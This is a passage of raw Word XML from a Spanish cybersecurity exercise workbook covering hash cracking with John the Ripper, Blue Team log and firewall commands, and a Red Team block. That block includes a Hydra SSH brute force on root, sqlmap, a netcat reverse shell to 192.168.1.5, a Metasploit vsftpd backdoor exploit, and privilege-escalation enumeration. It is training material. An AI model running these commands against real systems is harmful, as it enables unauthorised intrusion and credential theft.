    <w:p w14:paraId="517B3CAC" w14:textId="39F2403C" w:rsidR="002C78F8" w:rsidRPr="002C78F8" w:rsidRDefault="002C78F8" w:rsidP="002C78F8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>55</w:t>
      </w:r>
      <w:r w:rsidRPr="002C78F8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>. Ejecutar John indicando el formato</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD373D0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john --format=raw-md5 hash2.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0EF0E4" w14:textId="32DD3D61" w:rsidR="002C78F8" w:rsidRPr="002C78F8" w:rsidRDefault="002C78F8" w:rsidP="002C78F8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>56</w:t>
      </w:r>
      <w:r w:rsidRPr="002C78F8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>. Mostrar el resultado</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3C3E42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john --show --format=raw-md5 hash2.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782D4550" w14:textId="77777777" w:rsidR="002C78F8" w:rsidRPr="002C78F8" w:rsidRDefault="002C78F8" w:rsidP="002C78F8">
      <w:r w:rsidRPr="002C78F8">
        <w:pict w14:anchorId="025D9006">
          <v:rect id="_x0000_i1166" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC8F802" w14:textId="77777777" w:rsidR="002C78F8" w:rsidRPr="002C78F8" w:rsidRDefault="002C78F8" w:rsidP="002C78F8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C78F8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Otro ejemplo con SHA-256</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67DF5EEF" w14:textId="6918B441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57</w:t>
      </w:r>
      <w:r w:rsidRPr="002C78F8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>. Generar hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F49DA8D" w14:textId="77777777" w:rsidR="002C78F8" w:rsidRPr="002C78F8" w:rsidRDefault="002C78F8" w:rsidP="002C78F8">
      <w:r w:rsidRPr="002C78F8">
        <w:t>echo -n "hola123" | sha256sum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F524A5C" w14:textId="77777777" w:rsidR="002C78F8" w:rsidRPr="002C78F8" w:rsidRDefault="002C78F8" w:rsidP="002C78F8">
      <w:r w:rsidRPr="002C78F8">
        <w:t>Te dará un hash largo. Lo copias en un archivo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FB7E12" w14:textId="77777777" w:rsidR="002C78F8" w:rsidRPr="002C78F8" w:rsidRDefault="002C78F8" w:rsidP="002C78F8">
      <w:r w:rsidRPr="002C78F8">
        <w:t>echo "AQUI_EL_HASH" &gt; sha256.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2520396E" w14:textId="63388FDC" w:rsidR="002C78F8" w:rsidRPr="002C78F8" w:rsidRDefault="002C78F8" w:rsidP="002C78F8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>58</w:t>
      </w:r>
      <w:r w:rsidRPr="002C78F8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>. Probar con John</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6047EFF9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john --format=raw-sha256 sha256.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42CE1A71" w14:textId="310447E9" w:rsidR="002C78F8" w:rsidRPr="002C78F8" w:rsidRDefault="002C78F8" w:rsidP="002C78F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59</w:t>
      </w:r>
      <w:r w:rsidRPr="002C78F8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>. Ver resultado</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D94BF8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john --show --format=raw-sha256 sha256.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66447103" w14:textId="77777777" w:rsidR="002C78F8" w:rsidRPr="002C78F8" w:rsidRDefault="002C78F8" w:rsidP="002C78F8">
      <w:r w:rsidRPr="002C78F8">
        <w:pict w14:anchorId="5A6AF93D">
          <v:rect id="_x0000_i1167" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB06D1C" w14:textId="5E5B76CA" w:rsidR="002C78F8" w:rsidRPr="002C78F8" w:rsidRDefault="002C78F8" w:rsidP="002C78F8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>60.</w:t>
      </w:r>
      <w:r w:rsidRPr="002C78F8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ejemplo usando diccionario</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D56B007" w14:textId="77777777" w:rsidR="002C78F8" w:rsidRPr="002C78F8" w:rsidRDefault="002C78F8" w:rsidP="002C78F8">
      <w:r w:rsidRPr="002C78F8">
        <w:t>Si quieres que lo intente con rockyou:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51ABC2C0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john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt hash2.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455B2128" w14:textId="2485A2AF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Y luego:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5413DA77" w14:textId="77777777" w:rsidR="002C78F8" w:rsidRPr="002C78F8" w:rsidRDefault="002C78F8" w:rsidP="002C78F8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C78F8">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>john --show --format=raw-md5 hash2.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336FDDE3" w14:textId="77777777" w:rsidR="002C78F8" w:rsidRPr="002C78F8" w:rsidRDefault="002C78F8" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="118D3BF9" w14:textId="77777777" w:rsidR="002C78F8" w:rsidRPr="002C78F8" w:rsidRDefault="002C78F8" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F6C62B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🛡️</w:t>
      </w:r>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> BLOQUE 4: BLUE TEAM (61–80)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C13120A" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="77AA3ED5">
          <v:rect id="_x0000_i1079" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A7FF7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61. Ver logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72017A55" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>cat /var/log/auth.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBF0EDB" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="59396990">
          <v:rect id="_x0000_i1080" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A9CAB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62. Buscar intentos fallidos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD1A7B1" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00D607B1" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D607B1">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>grep "Failed password" /var/log/auth.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1AFE67" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="0A93A0A4">
          <v:rect id="_x0000_i1081" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="399E8BB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63. Ver conexiones</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12638EBB" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>ss -tunap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106750D6" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="5C86798F">
          <v:rect id="_x0000_i1082" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6694DE5B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64. Instalar firewall</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7823473C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sudo apt install ufw</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C70C480" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="2DF255D1">
          <v:rect id="_x0000_i1083" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2F5E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65. Activar firewall</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D496C61" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>sudo ufw enable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CFA632" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="44D2F7DC">
          <v:rect id="_x0000_i1084" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D27A7C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66. Permitir SSH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155D42EF" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>sudo ufw allow 22</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DD8E09" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="6C7B90F4">
          <v:rect id="_x0000_i1085" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9EC67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67. Bloquear puerto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59316D5E" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>sudo ufw deny 23</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583DA5AF" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="5B74DF45">
          <v:rect id="_x0000_i1086" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="500A120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68. Estado firewall</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6350A5" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>sudo ufw status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56198E33" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="2DA63302">
          <v:rect id="_x0000_i1087" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D71269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69. Monitorizar procesos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E1AC64" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>top</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349F741C" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="5BFF9E81">
          <v:rect id="_x0000_i1088" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="643632B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70. Alternativa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E44301C" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>htop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F65A4A" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="78709F57">
          <v:rect id="_x0000_i1089" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF2CAF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71–80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7660FF6E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fail2ban</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0234046B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auditoría de logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209A2E4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detección intrusos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55ED1BA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permisos sospechosos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0449B9D2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rootkits básicos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6A67F6" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="139DBCB4">
          <v:rect id="_x0000_i1090" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C230475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🔴</w:t>
      </w:r>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> BLOQUE 5: RED TEAM / PENTESTING (81–100)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466EF045" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="255CEEAE">
          <v:rect id="_x0000_i1091" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="290452E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81. Escaneo completo objetivo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25ECEE24" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>nmap -A -T4 192.168.1.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D78917B" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="793D3FE8">
          <v:rect id="_x0000_i1092" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6571CA3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82. Enumeración web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5967721A" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>nikto -h http://192.168.1.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70912C47" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="3DC9980C">
          <v:rect id="_x0000_i1093" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5CA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83. Fuerza bruta SSH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C067F7" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>hydra -l root -P rockyou.txt ssh://192.168.1.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686159E0" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="79DAEC6E">
          <v:rect id="_x0000_i1094" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C1DCD5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84. SQLMap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D41DE41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sqlmap -u "http://site.com?id=1" --dbs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F8154B" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="5EAD43A0">
          <v:rect id="_x0000_i1095" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0255A22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85. Escaneo subdominios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A39BB8F" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>dnsenum dominio.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DD392F" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="38084125">
          <v:rect id="_x0000_i1096" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E782E9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86. Netcat reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4495FF62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nc -e /bin/bash 192.168.1.5 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49732B2B" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="2FB7F120">
          <v:rect id="_x0000_i1097" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="624BDE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87. Listener</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B3D675" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>nc -lvp 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75370E5B" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="3EAA1372">
          <v:rect id="_x0000_i1098" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2EC0A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88. Explotación básica</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A2A45D" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>(Metasploit)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62882C65" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1C09C4" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="1DB8C672">
          <v:rect id="_x0000_i1099" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AF6D5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89. Buscar exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00023A83" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>search vsftpd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708B64E4" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="54A1C892">
          <v:rect id="_x0000_i1100" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EAA6C9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90. Configurar exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B151541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use exploit/unix/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5222B9D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91. Enumerar usuarios en un sistema Linux comprometido</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19405CFA" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Enunciado:</w:t>
      </w:r>
      <w:r w:rsidRPr="00206562">
        <w:br/>
        <w:t>Tras acceder a una máquina, obtén la lista de usuarios del sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553B9D9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B1886BC" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>cat /etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F5C9F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Este archivo contiene todos los usuarios del sistema. Es clave para saber posibles objetivos de escalada.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E50EEE7" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="69FBBD6D">
          <v:rect id="_x0000_i1101" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E9F14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92. Buscar archivos SUID (posible escalada de privilegios)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DA1712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archivos con permisos SUID en el sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B3E50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0B6729EC" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>find / -perm -4000 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC0026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Los archivos SUID se ejecutan con permisos de root → posible vulnerabilidad.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5429D235" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="799EDC08">
          <v:rect id="_x0000_i1102" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="637227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93. Ver procesos ejecutándose como root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D604BB5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Identifica procesos que se ejecutan como root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62452BE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12B326C0" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>ps aux | grep root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE24CB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Algunos servicios mal configurados pueden ser explotables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA5244D" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="5E6C0C26">
          <v:rect id="_x0000_i1103" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="736E7D8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94. Revisar tareas programadas (cron)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D1AE7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tareas programadas que puedan ser vulnerables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371F7ED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4E512BE9" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>crontab -l</w:t>
      </w:r>
      <w:r w:rsidRPr="00206562">
        <w:br/>
        <w:t>cat /etc/crontab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0E5985" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Explicación:</w:t>
      </w:r>
      <w:r w:rsidRPr="00206562">
        <w:br/>
        <w:t>Scripts ejecutados por root pueden ser modificables → escalada.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108D0EEC" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="721B07B6">
